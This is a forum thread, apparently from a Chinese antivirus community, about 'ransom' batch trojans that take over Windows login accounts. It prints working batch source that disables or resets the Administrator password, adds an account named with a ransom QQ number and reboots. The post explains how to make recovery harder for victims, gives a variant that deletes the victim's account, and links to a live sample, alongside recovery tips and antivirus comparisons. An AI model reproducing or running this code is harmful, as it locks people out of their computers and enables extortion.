借个地方吐槽一下敲竹杠木马

DJ

最近样本区里很时髦的一个样本是敲竹杠木马，不才也测试了好几天，就在这个说吧里借个地方吐槽一下敲竹杠木马。
敲竹杠bat制作    引自http://tieba.baidu.com/p/3129322902

这是效果图的bat源码：
---------------------我是可爱的分界线----------------------------------
@echo off
net user Administrator /active:no
net user Administrator meidemima
net user admin 12345.
net user 要密码加QQ1187385037 12345. /add
net localgroup 要密码加QQ1187385037 /add
shutdown.exe -r -t 1
---------------------我是可爱的分界线-----------------------------------
在这里解释一下
1 “net user Administrator /active:no”是禁用windows自带的Administrator超级管理员账户
2 用户名可随意更改，后面的是密码，也可随意更改
3 ”/add“就是添加用户
4 为什么要向Administrator添加和”要密码加QQxxxxxxxxxx“用户不一样的密码呢？
因为这是为了达到整人目的，受害者想你询问密码，你可以只告诉他”要密码加QQxxxxxxxx"的密码，如果他成功开启Administrator要来删除“要密码加QQxxxxxxxx”的话，没用，Administrator的密码是另一个，呵呵，双重保险
5 Administrator是系统内置的超级管理员，不能删除，如果你想删除受害者的用户（不是Administrator），可以这样编写（本人没测试过，只是按照bat语法来编的，不保证能完全运行）：
@echo off
net user windows用户名 /del
net user admin 12345.
net user 要密码加QQxxxxx 12345. /add
net localgroup 要密码加QQxxxxxx /add
shutdown.exe -r -t 1


不过一般这种敲竹杠常被人用来攻击原生只有Administrator用户的系统（一般来说如XP及XP以下的系统），如果原生用户名是自己自定义的话，这个敲竹杠就发挥不了作用了。

分享一个敲竹杠样本     引自http:  //tieba.baidu.com/p/3135458495

这个样本有些特殊，喜欢的可以研究一下。使用360解压查看，他居然冒充查杀链接。《PS:请勿实机运行。》
地址 http://pan.baidu.com/s/1sjDFNPz 密码123

@shift
?&cls
@echo off
net user Administrator meidemima
net user admin 131476892.
net user 要密码加QQ1747371912 131476892. /add
net localgroup 要密码加QQ1747371912 /add
shutdown.exe -s -t 1

调试线程已开启...
-----------------------
Msg ------ : 创建文件：C:\Documents and Settings\Administrator\Local Settings\Application Data\201308071141365201c1f0de55c.ico 【放行】
Msg ------ : 删除文件：C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3872.tmp 【放行】
Msg ------ : 创建文件：C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3872.bat 【放行】
Msg ------ : 运行命令：cmd.exe /c ""C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3872.bat" "C:\Documents and Settings\Administrator\桌面\迅游破解补丁.exe"" 【阻止】
Msg ------ : 删除文件：C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3872.bat 【阻止】
Msg ------ : 删除文件：C:\Documents and Settings\Administrator\Local Settings\Application Data\201308071141365201c1f0de55c.ico 【阻止】
Msg ------ : END
-----------------------
调试线程已关闭...

Msg ------ : 运行命令：cmd.exe /c ""C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3872.bat" "C:\Documents and Settings\Administrator\桌面\迅游破解补丁.exe"" 【阻止】


这一行的意思就是运行C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\3872.bat BAT文件。阻止后直接找到这个文件，然后记事本打开。 你就会发现代码了。

"想知道密码联系QQ****"和系统被锁的处理方法！    引自http ://tieba.baidu.com/p/2980344704
【请系统被加密并要求充Q币的朋友进这里！】
http://url.cn/RKDFVr

敲竹杠木马（改系统开机密码）分析工具
http://url.cn/Qlwd0h

Windows系统登录密码绕过工具
http://url.cn/KBhB57

[灌水]火绒剑查看密码
http://url.cn/QzCLBo

补充 刷外{过}{滤}挂 点赞 黑卡 什么的导致系统被锁请看这里 http://tieba.baidu.com/p/2997940409

可以尝试把恶意软件扩展名改为.txt，然后打开，查找关键字net、user、QQ号等，或许能发现密码。

---------------------------------------------------- 分界线 -----------------------------------------------------

大多数中此类恶意软件的网友是因为自己的幼稚和贪婪，理应得到教训和反省。


下面是我测试的一些图片，BAV太逊了，好几天都查不出这个木马，数字入库很快，而且数字卫士主防可以拦截此类木马。

利刀1937

赞一个，，，360确实对敲竹杠木马反应很快，，

Qutianshang

这个东西几乎是靠入库才能解决，主防来说，一旦牵扯到批处理了，就显得很是无力。

vm001

Qutianshang 发表于 2014-7-5 16:21
这个东西几乎是靠入库才能解决，主防来说，一旦牵扯到批处理了，就显得很是无力。

360和金山就防御的很好嘛

Qutianshang

vm001 发表于 2014-7-5 16:32
360和金山就防御的很好嘛

数字国内没试过，但是国际版在沙箱之内照样被关机，金山毒霸或许好一些，反正卫士拦不住。要是遇到批处理，微点大多数也是趴下了。只有MD还能够勉强支撑一二

利刀1937

Qutianshang 发表于 2014-7-5 16:38
数字国内没试过，但是国际版在沙箱之内照样被关机，金山毒霸或许好一些，反正卫士拦不住。要是遇 ...

关机一般不防御，，，